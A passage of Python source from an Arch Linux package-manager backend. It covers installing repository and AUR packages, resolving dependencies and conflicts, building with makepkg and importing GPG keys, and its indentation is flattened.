context.watcher.change_substatus(self.i18n['arch.uninstalling.conflict'].format(bold(conflicting_pkg)))
context.disable_progress_if_changing()
if context.removed is None:
context.removed = {}
res = self._uninstall(context=context, names={conflicting_pkg}, disk_loader=context.disk_loader,
remove_unneeded=False, skip_requirements=skip_requirements)
context.restabilish_progress()
return res
def _install_deps(self, context: TransactionContext, deps: List[Tuple[str, str]]) -> Iterable[str]:
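# Installs the given (name, repository) dependencies: repository packages are checked for conflicts, optionally
# pre-downloaded and installed through a single pacman call, while AUR dependencies are built one by one via their
# own transaction contexts. Returns the names that could not be installed (a falsy result means success).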
progress_increment = int(100 / len(deps))
progress = 0
self._update_progress(context, 1)
repo_deps, repo_dep_names, aur_deps_context = [], None, []
for dep in deps:
context.watcher.change_substatus(self.i18n['arch.install.dependency.install'].format(bold('{} ({})'.format(dep[0], dep[1]))))
if dep[1] == 'aur':
dep_context = context.gen_dep_context(dep[0], dep[1])
dep_src = self.aur_client.get_src_info(dep[0])
dep_context.base = dep_src['pkgbase']
aur_deps_context.append(dep_context)
else:
repo_deps.append(dep)
if repo_deps:
repo_dep_names = [d[0] for d in repo_deps]
if context.dependency:
context.watcher.change_substatus(self.i18n['arch.substatus.conflicts'])
else:
context.watcher.change_substatus(self.i18n['arch.checking.conflicts'].format(bold(context.name)))
all_provided = context.get_provided_map()
for dep, data in pacman.map_conflicts_with(repo_dep_names, remote=True).items():
if data and data['c']:
for c in data['c']:
source_conflict = all_provided.get(c)
if source_conflict:
conflict_pkg = [*source_conflict][0]
if dep != conflict_pkg:
if not self._request_conflict_resolution(dep, conflict_pkg, context,
skip_requirements=data['r'] and conflict_pkg in data['r']):
return {dep}
downloaded = 0
if self._multithreaded_download_enabled(context.config):
try:
pkg_sizes = pacman.map_download_sizes(repo_dep_names)
downloaded = self._download_packages(repo_dep_names, context.handler, context.root_password, pkg_sizes, multithreaded=True)
except ArchDownloadException:
return repo_dep_names
status_handler = TransactionStatusHandler(watcher=context.watcher, i18n=self.i18n, names={*repo_dep_names},
logger=self.logger, percentage=len(repo_deps) > 1, downloading=downloaded)
status_handler.start()
installed, _ = context.handler.handle_simple(pacman.install_as_process(pkgpaths=repo_dep_names,
root_password=context.root_password,
file=False),
output_handler=status_handler.handle)
if installed:
pkg_map = {d[0]: ArchPackage(name=d[0], repository=d[1], maintainer=d[1],
categories=self.categories.get(d[0])) for d in repo_deps}
disk.write_several(pkg_map, overwrite=True, maintainer=None)
progress += len(repo_deps) * progress_increment
self._update_progress(context, progress)
else:
return repo_dep_names
for aur_context in aur_deps_context:
installed = self._install_from_aur(aur_context)
if not installed:
return {aur_context.name}
else:
progress += progress_increment
self._update_progress(context, progress)
self._update_progress(context, 100)
def _map_repos(self, pkgnames: Collection[str]) -> dict:
pkg_repos = pacman.get_repositories(pkgnames) # getting repositories set
if len(pkgnames) != len(pkg_repos): # checking if any dep not found in the distro repos are from AUR
norepos = {p for p in pkgnames if p not in pkg_repos}
for pkginfo in self.aur_client.get_info(norepos):
if pkginfo.get('Name') in norepos:
pkg_repos[pkginfo['Name']] = 'aur'
return pkg_repos
def _pre_download_source(self, pkgname: str, project_dir: str, watcher: ProcessWatcher) -> bool:
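# Only effective when the configured file downloader supports multi-threaded downloads: source files declared in the
# .SRCINFO (allowed protocols only, blacklisted extensions excluded) are downloaded into the project directory before
# the build, honoring the 'output::url' syntax.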
if self.context.file_downloader.is_multithreaded():
with open('{}/.SRCINFO'.format(project_dir)) as f:
srcinfo = aur.map_srcinfo(string=f.read(), pkgname=pkgname)
pre_download_files = []
for attr in SOURCE_FIELDS:
if srcinfo.get(attr):
if attr == 'source_x86_64' and not self.context.is_system_x86_64():
continue
else:
for f in srcinfo[attr]:
if RE_PRE_DOWNLOAD_WL_PROTOCOLS.match(f) and not RE_PRE_DOWNLOAD_BL_EXT.match(f):
pre_download_files.append(f)
if pre_download_files:
for f in pre_download_files:
fdata = f.split('::')
args = {'watcher': watcher, 'cwd': project_dir}
if len(fdata) > 1:
args.update({'file_url': fdata[1], 'output_path': fdata[0]})
else:
args.update({'file_url': fdata[0], 'output_path': fdata[0].split('/')[-1]})
if not self.context.file_downloader.download(**args):
watcher.print('Could not download source file {}'.format(args['file_url']))
return False
return True
def _display_pkgbuild_for_editing(self, pkgname: str, watcher: ProcessWatcher, pkgbuild_path: str) -> bool:
with open(pkgbuild_path) as f:
pkgbuild = f.read()
pkgbuild_input = TextInputComponent(label='', value=pkgbuild, type_=TextInputType.MULTIPLE_LINES,
min_width=500, min_height=350)
watcher.request_confirmation(title='PKGBUILD ({})'.format(pkgname),
body='',
components=[pkgbuild_input],
confirmation_label=self.i18n['proceed'].capitalize(),
deny_button=False)
if pkgbuild_input.get_value() != pkgbuild:
with open(pkgbuild_path, 'w+') as f:
f.write(pkgbuild_input.get_value())
return makepkg.update_srcinfo('/'.join(pkgbuild_path.split('/')[0:-1]))
return False
def _ask_for_pkgbuild_edition(self, pkgname: str, arch_config: dict, watcher: ProcessWatcher, pkgbuild_path: str) -> bool:
if pkgbuild_path:
if arch_config['edit_aur_pkgbuild'] is None:
if not watcher.request_confirmation(title=self.i18n['confirmation'].capitalize(),
body=self.i18n['arch.aur.action.edit_pkgbuild.body'].format(bold(pkgname)),
confirmation_label=self.i18n['no'].capitalize(),
deny_label=self.i18n['yes'].capitalize()):
return self._display_pkgbuild_for_editing(pkgname, watcher, pkgbuild_path)
elif arch_config['edit_aur_pkgbuild']:
return self._display_pkgbuild_for_editing(pkgname, watcher, pkgbuild_path)
return False
def _edit_pkgbuild_and_update_context(self, context: TransactionContext):
if context.new_pkg or context.name in self._read_editable_pkgbuilds():
if self._ask_for_pkgbuild_edition(pkgname=context.name,
arch_config=context.config,
watcher=context.watcher,
pkgbuild_path='{}/PKGBUILD'.format(context.project_dir)):
context.pkgbuild_edited = True
srcinfo = aur.map_srcinfo(string=makepkg.gen_srcinfo(context.project_dir), pkgname=context.name)
if srcinfo:
context.name = srcinfo['pkgname']
context.base = srcinfo['pkgbase']
if context.pkg:
for pkgattr, srcattr in {'name': 'pkgname',
'package_base': 'pkgbase',
'version': 'pkgversion',
'latest_version': 'pkgversion',
'license': 'license',
'description': 'pkgdesc'}.items():
setattr(context.pkg, pkgattr, srcinfo.get(srcattr, getattr(context.pkg, pkgattr)))
def _read_srcinfo(self, context: TransactionContext) -> str:
src_path = '{}/.SRCINFO'.format(context.project_dir)
if not os.path.exists(src_path):
srcinfo = makepkg.gen_srcinfo(context.project_dir, context.custom_pkgbuild_path)
with open(src_path, 'w+') as f:
f.write(srcinfo)
else:
with open(src_path) as f:
srcinfo = f.read()
return srcinfo
def _build(self, context: TransactionContext) -> bool:
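# Builds an AUR package: offers PKGBUILD edition, pre-downloads sources, resolves dependencies and GPG keys,
# runs makepkg (optionally with all CPUs set to 'performance') and then installs the generated files.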
self._edit_pkgbuild_and_update_context(context)
self._pre_download_source(context.name, context.project_dir, context.watcher)
self._update_progress(context, 50)
context.custom_pkgbuild_path = self._gen_custom_pkgbuild_if_required(context)
if not self._handle_aur_package_deps_and_keys(context):
return False
# building main package
context.watcher.change_substatus(self.i18n['arch.building.package'].format(bold(context.name)))
optimize = bool(context.config['optimize']) and cpu_manager.supports_performance_mode()
cpus_changed, cpu_prev_governors = False, None
if optimize:
cpus_changed, cpu_prev_governors = cpu_manager.set_all_cpus_to('performance', context.root_password, self.logger)
try:
pkgbuilt, output = makepkg.make(pkgdir=context.project_dir,
optimize=optimize,
handler=context.handler,
custom_pkgbuild=context.custom_pkgbuild_path)
finally:
if cpus_changed and cpu_prev_governors:
self.logger.info("Restoring CPU governors")
cpu_manager.set_cpus(cpu_prev_governors, context.root_password, {'performance'}, self.logger)
self._update_progress(context, 65)
if pkgbuilt:
self.__fill_aur_output_files(context)
self.logger.info("Reading '{}' cloned repository current commit".format(context.name))
context.commit = git.get_current_commit(context.project_dir)
if not context.commit:
self.logger.error("Could not read '{}' cloned repository current commit".format(context.name))
if self._install(context=context):
self._save_pkgbuild(context)
if context.update_aur_index:
self._update_aur_index(context.watcher)
if context.dependency or context.skip_opt_deps:
return True
context.watcher.change_substatus(self.i18n['arch.optdeps.checking'].format(bold(context.name)))
self._update_progress(context, 100)
if self._install_optdeps(context):
return True
return False
def _update_aur_index(self, watcher: ProcessWatcher):
if self.context.internet_checker.is_available():
if watcher:
watcher.change_substatus(self.i18n['arch.task.aur.index.status'])
idx_updater = AURIndexUpdater(context=self.context, taskman=TaskManager()) # null task manager
idx_updater.update_index()
else:
self.logger.warning("Could not update the AUR index: no internet connection detected")
def __fill_aur_output_files(self, context: TransactionContext):
self.logger.info("Determining output files of '{}'".format(context.name))
context.watcher.change_substatus(self.i18n['arch.aur.build.list_output'])
output_files = {f for f in makepkg.list_output_files(context.project_dir, context.custom_pkgbuild_path) if os.path.isfile(f)}
if output_files:
context.install_files = output_files
else:
gen_file = [fname for root, dirs, files in os.walk(context.build_dir) for fname in files if
re.match(r'^{}-.+\.tar\.(xz|zst)'.format(context.name), fname)]
if not gen_file:
context.watcher.print('Could not find the built package. Aborting...')
return False
file_to_install = gen_file[0]
if len(gen_file) > 1:
srcinfo = aur.map_srcinfo(string=makepkg.gen_srcinfo(context.project_dir), pkgname=context.name)
pkgver = '-{}'.format(srcinfo['pkgver']) if srcinfo.get('pkgver') else ''
pkgrel = '-{}'.format(srcinfo['pkgrel']) if srcinfo.get('pkgrel') else ''
arch = '-{}'.format(srcinfo['arch']) if srcinfo.get('arch') else ''
name_start = '{}{}{}{}'.format(context.name, pkgver, pkgrel, arch)
perfect_match = [f for f in gen_file if f.startswith(name_start)]
if perfect_match:
file_to_install = perfect_match[0]
context.install_files = {'{}/{}'.format(context.project_dir, file_to_install)}
context.watcher.change_substatus('')
def _save_pkgbuild(self, context: TransactionContext):
cache_path = ArchPackage.disk_cache_path(context.name)
if not os.path.exists(cache_path):
try:
os.mkdir(cache_path)
except:
print("Could not create cache directory '{}'".format(cache_path))
traceback.print_exc()
return
src_pkgbuild = '{}/PKGBUILD'.format(context.project_dir)
dest_pkgbuild = '{}/PKGBUILD'.format(cache_path)
try:
shutil.copy(src_pkgbuild, dest_pkgbuild)
except:
context.watcher.print("Could not copy '{}' to '{}'".format(src_pkgbuild, dest_pkgbuild))
traceback.print_exc()
def _ask_and_install_missing_deps(self, context: TransactionContext, missing_deps: List[Tuple[str, str]]) -> bool:
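# Asks the user to confirm the missing dependencies and installs them with progress updates temporarily disabled.
# The names of the installed dependencies are registered in the transaction context.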
context.watcher.change_substatus(self.i18n['arch.missing_deps_found'].format(bold(context.name)))
if not confirmation.request_install_missing_deps(context.name, missing_deps, context.watcher, self.i18n):
context.watcher.print(self.i18n['action.cancelled'])
return False
old_progress_behavior = context.change_progress
context.change_progress = False
deps_not_installed = self._install_deps(context, missing_deps)
context.change_progress = old_progress_behavior
if deps_not_installed:
message.show_deps_not_installed(context.watcher, context.name, deps_not_installed, self.i18n)
return False
context.installed.update({d[0] for d in missing_deps})
return True
def _list_missing_deps(self, context: TransactionContext) -> List[Tuple[str, str]]:
context.watcher.change_substatus(self.i18n['arch.checking.deps'].format(bold(context.name)))
ti = time.time()
if context.repository == 'aur':
srcinfo = aur.map_srcinfo(string=self._read_srcinfo(context),
pkgname=context.name if (not context.pkgs_to_build or len(context.pkgs_to_build) == 1) else None)
if context.pkgs_to_build and len(context.pkgs_to_build) > 1: # removing self dependencies from srcinfo
for attr in ('depends', 'makedepends', 'optdepends'):
dep_list = srcinfo.get(attr)
if dep_list and isinstance(dep_list, list):
to_remove = set()
for dep in dep_list:
dep_name = RE_DEP_OPERATORS.split(dep.split(':')[0])[0].strip()
if dep_name and dep_name in context.pkgs_to_build:
to_remove.add(dep)
for dep in to_remove:
dep_list.remove(dep)
pkgs_data = {context.name: self.aur_client.map_update_data(context.name, context.get_version(), srcinfo)}
else:
pkgs_data = pacman.map_updates_data(context.get_packages_paths(), files=bool(context.install_files))
deps_data, already_checked_deps = {}, set()
missing_deps = self.deps_analyser.map_missing_deps(pkgs_data=pkgs_data,
provided_map=context.get_provided_map(),
aur_index=context.get_aur_idx(self.aur_client),
deps_checked=already_checked_deps,
deps_data=deps_data,
sort=True,
remote_provided_map=context.get_remote_provided_map(),
remote_repo_map=context.get_remote_repo_map(),
automatch_providers=context.config['automatch_providers'],
watcher=context.watcher)
tf = time.time()
self.logger.info("Took {0:.2f} seconds to check for missing dependencies".format(tf - ti))
return missing_deps
def _handle_missing_deps(self, context: TransactionContext) -> bool:
try:
missing_deps = self._list_missing_deps(context)
except PackageNotFoundException:
return False
except:
traceback.print_exc()
return False
if missing_deps is None:
return False # called off by the user
if not missing_deps:
return True
elif not self._ask_and_install_missing_deps(context=context, missing_deps=missing_deps):
return False # called off by the user or something went wrong
else:
return True
def _handle_aur_package_deps_and_keys(self, context: TransactionContext) -> bool:
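# Installs missing dependencies and then runs makepkg.check for the project: unknown GPG keys can be imported on
# demand, and the checksum-failure dialog uses swapped buttons, so the build only proceeds when the user picks
# 'yes' (the deny option).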
handled_deps = self._handle_missing_deps(context)
if not handled_deps:
return False
check_res = makepkg.check(context.project_dir,
optimize=bool(context.config['optimize']),
missing_deps=False,
handler=context.handler,
custom_pkgbuild=context.custom_pkgbuild_path)
if check_res:
if check_res.get('gpg_key'):
if context.watcher.request_confirmation(title=self.i18n['arch.install.aur.unknown_key.title'],
body=self.i18n['arch.install.aur.unknown_key.body'].format(bold(context.name), bold(check_res['gpg_key']))):
context.watcher.change_substatus(self.i18n['arch.aur.install.unknown_key.status'].format(bold(check_res['gpg_key'])))
self.logger.info("Importing GPG key {}".format(check_res['gpg_key']))
gpg_res = self.context.http_client.get(URL_GPG_SERVERS)
gpg_server = gpg_res.text.split('\n')[0] if gpg_res else None
if not context.handler.handle(gpg.receive_key(check_res['gpg_key'], gpg_server)):
self.logger.error("An error occurred while importing the GPG key {}".format(check_res['gpg_key']))
context.watcher.show_message(title=self.i18n['error'].capitalize(),
body=self.i18n['arch.aur.install.unknown_key.receive_error'].format(bold(check_res['gpg_key'])))
return False
else:
context.watcher.print(self.i18n['action.cancelled'])
return False
if check_res.get('validity_check'):
body = "<p>{}</p><p>{}</p>".format(self.i18n['arch.aur.install.validity_check.body'].format(bold(context.name)),
self.i18n['arch.aur.install.validity_check.proceed'])
return not context.watcher.request_confirmation(title=self.i18n['arch.aur.install.validity_check.title'].format('( checksum )'),
body=body,
confirmation_label=self.i18n['no'].capitalize(),
deny_label=self.i18n['yes'].capitalize())
return True
def _install_optdeps(self, context: TransactionContext) -> bool:
odeps = pacman.map_optional_deps({context.name}, remote=False, not_installed=True).get(context.name)
if not odeps:
return True
repo_mapping = self._map_repos(odeps.keys())
if repo_mapping:
final_optdeps = {dep: {'desc': odeps.get(dep), 'repository': repository} for dep, repository in repo_mapping.items() if repository}
deps_to_install = confirmation.request_optional_deps(context.name, final_optdeps, context.watcher, self.i18n)
if not deps_to_install:
return True
else:
deps_data = {}
opt_repo_deps, aur_threads = [], []
for dep in deps_to_install:
if repo_mapping[dep] == 'aur':
t = Thread(target=self.aur_client.fill_update_data, args=(deps_data, dep, None, None), daemon=True)
t.start()
aur_threads.append(t)
else:
opt_repo_deps.append(dep)
if opt_repo_deps:
deps_data.update(pacman.map_updates_data(opt_repo_deps))
for t in aur_threads:
t.join()
provided_map = pacman.map_provided()
remote_provided_map = pacman.map_provided(remote=True)
remote_repo_map = pacman.map_repositories()
aur_index = self.aur_client.read_index() if aur_threads else None
subdeps_data = {}
missing_deps = self.deps_analyser.map_missing_deps(pkgs_data=deps_data,
provided_map=provided_map,
aur_index=aur_index,
deps_checked=set(),
deps_data=subdeps_data,
watcher=context.watcher,
remote_provided_map=remote_provided_map,
remote_repo_map=remote_repo_map,
automatch_providers=context.config['automatch_providers'],
sort=False)
if missing_deps is None:
return False # called off by the user
to_sort = []
if missing_deps:
for dep in missing_deps:
# TODO handle multiple providers for a missing dep
if dep[0] not in deps_to_install and dep[1] != '__several__':
to_sort.append(dep[0])
display_deps_dialog = bool(to_sort) # it means there are subdeps to be installed so a new dialog should be displayed
to_sort.extend(deps_data.keys())
sorted_deps = sorting.sort(to_sort, {**deps_data, **subdeps_data}, provided_map)
if display_deps_dialog and not confirmation.request_install_missing_deps(None, sorted_deps, context.watcher, self.i18n):
context.watcher.print(self.i18n['action.cancelled'])
return True # because the main package installation was successful
old_progress_behavior = context.change_progress
context.change_progress = True
context.dependency = True
deps_not_installed = self._install_deps(context, sorted_deps)
context.change_progress = old_progress_behavior
if deps_not_installed:
message.show_optdeps_not_installed(deps_not_installed, context.watcher, self.i18n)
else:
context.installed.update({dep[0] for dep in sorted_deps})
return True
def _multithreaded_download_enabled(self, arch_config: dict) -> bool:
return bool(arch_config['repositories_mthread_download']) \
and self.context.file_downloader.is_multithreaded() \
and pacman.is_mirrors_available()
def _download_packages(self, pkgnames: List[str], handler: ProcessHandler, root_password: str, sizes: Dict[str, int] = None, multithreaded: bool = True) -> int:
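# Downloads repository packages before installation, either through the multi-threaded download service or through
# pacman. Returns the number of packages downloaded and raises ArchDownloadException when the fallback download fails.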
if multithreaded:
download_service = MultithreadedDownloadService(file_downloader=self.context.file_downloader,
http_client=self.http_client,
logger=self.context.logger,
i18n=self.i18n)
self.logger.info("Initializing multi-threaded download for {} repository package(s)".format(len(pkgnames)))
return download_service.download_packages(pkgs=pkgnames,
handler=handler,
sizes=sizes,
root_password=root_password)
else:
self.logger.info("Downloading {} repository package(s)".format(len(pkgnames)))
output_handler = TransactionStatusHandler(handler.watcher, self.i18n, pkgnames, self.logger)
output_handler.start()
try:
success, _ = handler.handle_simple(pacman.download(root_password, *pkgnames), output_handler=output_handler.handle)
if success:
return len(pkgnames)
else:
raise ArchDownloadException()
except:
traceback.print_exc()
raise ArchDownloadException()
def _install(self, context: TransactionContext) -> bool:
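# A simulated pacman transaction is executed first (without notifying the watcher) to detect unresolvable conflicts.
# Conflicting packages that are not part of the installation are uninstalled before the real transaction takes place.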
pkgpaths = context.get_packages_paths()
context.watcher.change_substatus(self.i18n['arch.checking.conflicts'].format(bold(context.name)))
self.logger.info("Checking for possible conflicts with '{}'".format(context.name))
_, output = context.handler.handle_simple(pacman.install_as_process(pkgpaths=pkgpaths,
root_password=context.root_password,
pkgdir=context.project_dir or '.',
file=bool(context.install_files),
simulate=True),
notify_watcher=False)
self._update_progress(context, 70)
if 'unresolvable package conflicts detected' in output:
self.logger.info("Conflicts detected for '{}'".format(context.name))
conflict_msgs = RE_CONFLICT_DETECTED.findall(output)
conflicting_apps = {n.strip() for m in conflict_msgs for n in m.split(' and ')}
conflict_msg = ' {} '.format(self.i18n['and']).join([bold(c) for c in conflicting_apps])
if not context.watcher.request_confirmation(title=self.i18n['arch.install.conflict.popup.title'],
body=self.i18n['arch.install.conflict.popup.body'].format(conflict_msg)):
context.watcher.print(self.i18n['action.cancelled'])
return False
else: # uninstall conflicts
self._update_progress(context, 75)
names_to_install = context.get_package_names()
to_uninstall = {conflict for conflict in conflicting_apps if conflict not in names_to_install}
if to_uninstall:
self.logger.info("Preparing to uninstall conflicting packages: {}".format(to_uninstall))
context.watcher.change_substatus(self.i18n['arch.uninstalling.conflict'])
if context.removed is None:
context.removed = {}
to_install_replacements = pacman.map_replaces(names_to_install)
skip_requirement_checking = False
if to_install_replacements: # checking if the packages to be installed replace the installed packages
all_replacements = set()
for replacements in to_install_replacements:
all_replacements.update(replacements)
if all_replacements:
for pkg in to_uninstall:
if pkg not in all_replacements:
break
skip_requirement_checking = True
context.disable_progress_if_changing()
if not self._uninstall(names=to_uninstall, context=context, remove_unneeded=False,
disk_loader=context.disk_loader, skip_requirements=skip_requirement_checking):
context.watcher.show_message(title=self.i18n['error'],
body=self.i18n['arch.uninstalling.conflict.fail'].format(', '.join((bold(p) for p in to_uninstall))),
type_=MessageType.ERROR)
return False
else:
context.restabilish_progress()
else:
self.logger.info("No conflict detected for '{}'".format(context.name))
self._update_progress(context, 80)
to_install = []
if context.missing_deps:
to_install.extend((d[0] for d in context.missing_deps))
to_install.extend(pkgpaths)
downloaded = 0
if self._multithreaded_download_enabled(context.config):
to_download = [p for p in to_install if not p.startswith('/')]
if to_download:
try:
pkg_sizes = pacman.map_download_sizes(to_download)
downloaded = self._download_packages(to_download, context.handler, context.root_password, pkg_sizes, multithreaded=True)
except ArchDownloadException:
return False
if not context.dependency:
status_handler = TransactionStatusHandler(context.watcher, self.i18n, to_install, self.logger,
percentage=len(to_install) > 1,
downloading=downloaded)
status_handler.start()
else:
status_handler = None
installed_with_same_name = self.read_installed(disk_loader=context.disk_loader, internet_available=True, names=context.get_package_names()).installed
context.watcher.change_substatus(self.i18n['arch.installing.package'].format(bold(context.name)))
installed = self._handle_install_call(context=context, to_install=to_install, status_handler=status_handler)
if status_handler:
status_handler.stop_working()
status_handler.join()
self._update_progress(context, 95)
if installed:
context.installed.update(context.get_package_names())
context.installed.update((p for p in to_install if not p.startswith('/')))
if installed_with_same_name:
for p in installed_with_same_name:
context.removed[p.name] = p
context.watcher.change_substatus(self.i18n['status.caching_data'].format(bold(context.name)))
if not context.maintainer:
if context.pkg and context.pkg.maintainer:
pkg_maintainer = context.pkg.maintainer
elif context.repository == 'aur':
aur_infos = self.aur_client.get_info({context.name})
pkg_maintainer = aur_infos[0].get('Maintainer') if aur_infos else None
else:
pkg_maintainer = context.repository
else:
pkg_maintainer = context.maintainer
cache_map = {context.name: ArchPackage(name=context.name,
repository=context.repository,
maintainer=pkg_maintainer,
last_modified=context.last_modified,
commit=context.commit,
categories=self.categories.get(context.name))}
if context.missing_deps:
aur_deps = {dep[0] for dep in context.missing_deps if dep[1] == 'aur'}
if aur_deps:
aur_data = self.aur_client.get_info(aur_deps)
if aur_data:
aur_data = {info['Name']: info for info in aur_data}
else:
aur_data = {n: {} for n in aur_deps}
else:
aur_data = None
for dep in context.missing_deps:
cache_map[dep[0]] = ArchPackage(name=dep[0],
repository=dep[1],
maintainer=dep[1] if dep[1] != 'aur' else (aur_data[dep[0]].get('Maintainer') if aur_data else None),
categories=self.categories.get(context.name))
disk.write_several(pkgs=cache_map, maintainer=None, overwrite=True)
context.watcher.change_substatus('')
self._update_progress(context, 100)
return installed
def _call_pacman_install(self, context: TransactionContext, to_install: List[str], overwrite_files: bool, status_handler: Optional[object] = None) -> Tuple[bool, str]:
return context.handler.handle_simple(pacman.install_as_process(pkgpaths=to_install,
root_password=context.root_password,
file=context.has_install_files(),
pkgdir=context.project_dir,
overwrite_conflicting_files=overwrite_files),
output_handler=status_handler.handle if status_handler else None)
def _handle_install_call(self, context: TransactionContext, to_install: List[str], status_handler) -> bool:
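# Tries a regular installation first. If pacman reports conflicting files, a dialog with swapped buttons is displayed
# (confirmation = stop, deny = proceed): when the user chooses to proceed, the installation is retried overwriting
# the conflicting files.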
installed, output = self._call_pacman_install(context=context, to_install=to_install,
overwrite_files=False, status_handler=status_handler)
if not installed and 'conflicting files' in output:
if not context.handler.watcher.request_confirmation(title=self.i18n['warning'].capitalize(),
body=self.i18n['arch.install.error.conflicting_files'].format(bold(context.name)) + ':',
deny_label=self.i18n['arch.install.error.conflicting_files.proceed'],
confirmation_label=self.i18n['arch.install.error.conflicting_files.stop'],
components=self._map_conflicting_file(output)):
installed, output = self._call_pacman_install(context=context, to_install=to_install,
overwrite_files=True, status_handler=status_handler)
return installed
def _update_progress(self, context: TransactionContext, val: int):
if context.change_progress:
context.watcher.change_progress(val)
def _import_pgp_keys(self, pkgname: str, root_password: str, handler: ProcessHandler):
srcinfo = self.aur_client.get_src_info(pkgname)
if srcinfo.get('validpgpkeys'):
handler.watcher.print(self.i18n['arch.aur.install.verifying_pgp'])
keys_to_download = [key for key in srcinfo['validpgpkeys'] if not pacman.verify_pgp_key(key)]
if keys_to_download:
keys_str = ''.join(
['<br/><span style="font-weight:bold"> - {}</span>'.format(k) for k in keys_to_download])
msg_body = '{}:<br/>{}<br/><br/>{}'.format(self.i18n['arch.aur.install.pgp.body'].format(bold(pkgname)),
keys_str, self.i18n['ask.continue'])
if handler.watcher.request_confirmation(title=self.i18n['arch.aur.install.pgp.title'], body=msg_body):
for key in keys_to_download:
handler.watcher.change_substatus(self.i18n['arch.aur.install.pgp.substatus'].format(bold(key)))
if not handler.handle(pacman.receive_key(key, root_password)):
handler.watcher.show_message(title=self.i18n['error'],
body=self.i18n['arch.aur.install.pgp.receive_fail'].format(
bold(key)),
type_=MessageType.ERROR)
return False
if not handler.handle(pacman.sign_key(key, root_password)):
handler.watcher.show_message(title=self.i18n['error'],
body=self.i18n['arch.aur.install.pgp.sign_fail'].format(
bold(key)),
type_=MessageType.ERROR)
return False
handler.watcher.change_substatus(self.i18n['arch.aur.install.pgp.success'])
else:
handler.watcher.print(self.i18n['action.cancelled'])
return False
def _install_from_aur(self, context: TransactionContext) -> bool:
self._optimize_makepkg(context.config, context.watcher)
context.build_dir = '{}/build_{}'.format(get_build_dir(context.config), int(time.time()))
try:
if not os.path.exists(context.build_dir):
build_dir = context.handler.handle(SystemProcess(new_subprocess(['mkdir', '-p', context.build_dir])))
self._update_progress(context, 10)
if build_dir:
base_name = context.get_base_name()
context.watcher.change_substatus(self.i18n['arch.clone'].format(bold(base_name)))
cloned, _ = context.handler.handle_simple(git.clone_as_process(url=URL_GIT.format(base_name), cwd=context.build_dir, depth=1))
if cloned:
self._update_progress(context, 40)
context.project_dir = '{}/{}'.format(context.build_dir, base_name)
return self._build(context)
finally:
if os.path.exists(context.build_dir) and context.config['aur_remove_build_dir']:
context.handler.handle(SystemProcess(new_subprocess(['rm', '-rf', context.build_dir])))
return False
def _sync_databases(self, arch_config: dict, aur_supported: bool, root_password: str, handler: ProcessHandler, change_substatus: bool = True):
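# Synchronizes the pacman databases when enabled in the configuration and the last synchronization is considered
# outdated; the synchronization timestamp is registered on success.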
if bool(arch_config['sync_databases']) and database.should_sync(arch_config, aur_supported, handler, self.logger):
if change_substatus:
handler.watcher.change_substatus(self.i18n['arch.sync_databases.substatus'])
synced, output = handler.handle_simple(pacman.sync_databases(root_password=root_password, force=True))
if synced:
database.register_sync(self.logger)
else:
self.logger.warning("It was not possible to synchronized the package databases")
handler.watcher.change_substatus(self.i18n['arch.sync_databases.substatus.error'])
def _optimize_makepkg(self, arch_config: dict, watcher: Optional[ProcessWatcher]):
if arch_config['optimize'] and not os.path.exists(CUSTOM_MAKEPKG_FILE):
watcher.change_substatus(self.i18n['arch.makepkg.optimizing'])
ArchCompilationOptimizer(i18n=self.i18n, logger=self.context.logger, taskman=TaskManager()).optimize()
def install(self, pkg: ArchPackage, root_password: str, disk_loader: Optional[DiskCacheLoader], watcher: ProcessWatcher, context: TransactionContext = None) -> TransactionResult:
self.aur_client.clean_caches()
if not self._check_action_allowed(pkg, watcher):
return TransactionResult(success=False, installed=[], removed=[])
handler = ProcessHandler(watcher) if not context else context.handler
if self._is_database_locked(handler, root_password):
return TransactionResult(success=False, installed=[], removed=[])
if context:
install_context = context
else:
install_context = TransactionContext.gen_context_from(pkg=pkg, handler=handler, arch_config=self.configman.get_config(),
root_password=root_password)
install_context.skip_opt_deps = False
install_context.disk_loader = disk_loader
install_context.update_aur_index = pkg.repository == 'aur'
self._sync_databases(arch_config=install_context.config, aur_supported=install_context.aur_supported,
root_password=root_password, handler=handler)
if pkg.repository == 'aur':
res = self._install_from_aur(install_context)
else:
res = self._install_from_repository(install_context)
if res:
pkg.name = install_context.name # changes the package name in case the PKGBUILD was edited
if os.path.exists(pkg.get_disk_data_path()):
with open(pkg.get_disk_data_path()) as f:
data = f.read()
if data:
data = json.loads(data)
pkg.fill_cached_data(data)
if install_context.new_pkg and install_context.config['edit_aur_pkgbuild'] is not False and pkg.repository == 'aur':
if install_context.pkgbuild_edited:
pkg.pkgbuild_editable = self._add_as_editable_pkgbuild(pkg.name)
else:
pkg.pkgbuild_editable = not self._remove_from_editable_pkgbuilds(pkg.name)
installed = []
if res and disk_loader and install_context.installed:
installed.append(pkg)
installed_to_load = []
if len(install_context.installed) > 1:
installed_to_load.extend({i for i in install_context.installed if i != pkg.name})
if installed_to_load:
installed_loaded = self.read_installed(disk_loader=disk_loader,
names=installed_to_load,
internet_available=True).installed
if installed_loaded:
installed.extend(installed_loaded)
if len(installed_loaded) + 1 != len(install_context.installed):
missing = ', '.join(n for n in installed_to_load if n not in {p.name for p in installed_loaded})
self.logger.warning("Could not load all installed packages. Missing: {}".format(missing))
removed = [*install_context.removed.values()] if install_context.removed else []
return TransactionResult(success=res, installed=installed, removed=removed)
def _install_from_repository(self, context: TransactionContext) -> bool:
try:
missing_deps = self._list_missing_deps(context)
except PackageNotFoundException:
self.logger.error("Package '{}' was not found")
return False
if missing_deps is None:
return False # called off by the user
if missing_deps:
if any((dep for dep in missing_deps if dep[1] == 'aur')):
context.watcher.show_message(title=self.i18n['error'].capitalize(),
body=self.i18n['arch.install.repo_pkg.error.aur_deps'],
type_=MessageType.ERROR)
return False
context.missing_deps = missing_deps
context.watcher.change_substatus(self.i18n['arch.missing_deps_found'].format(bold(context.name)))
if not confirmation.request_install_missing_deps(context.name, missing_deps, context.watcher, self.i18n):
context.watcher.print(self.i18n['action.cancelled'])
return False
res = self._install(context)
if res and not context.skip_opt_deps:
self._update_progress(context, 100)
return self._install_optdeps(context)
return res
def _is_wget_available(self) -> bool:
return bool(shutil.which('wget'))
def is_enabled(self) -> bool:
return self.enabled
def set_enabled(self, enabled: bool):
self.enabled = enabled
def can_work(self) -> bool:
try:
return self.arch_distro and pacman.is_available() and self._is_wget_available()
except FileNotFoundError:
return False
def cache_to_disk(self, pkg: ArchPackage, icon_bytes: bytes, only_icon: bool):
pass
def requires_root(self, action: SoftwareAction, pkg: ArchPackage) -> bool:
if action == SoftwareAction.PREPARE:
arch_config = self.configman.get_config()
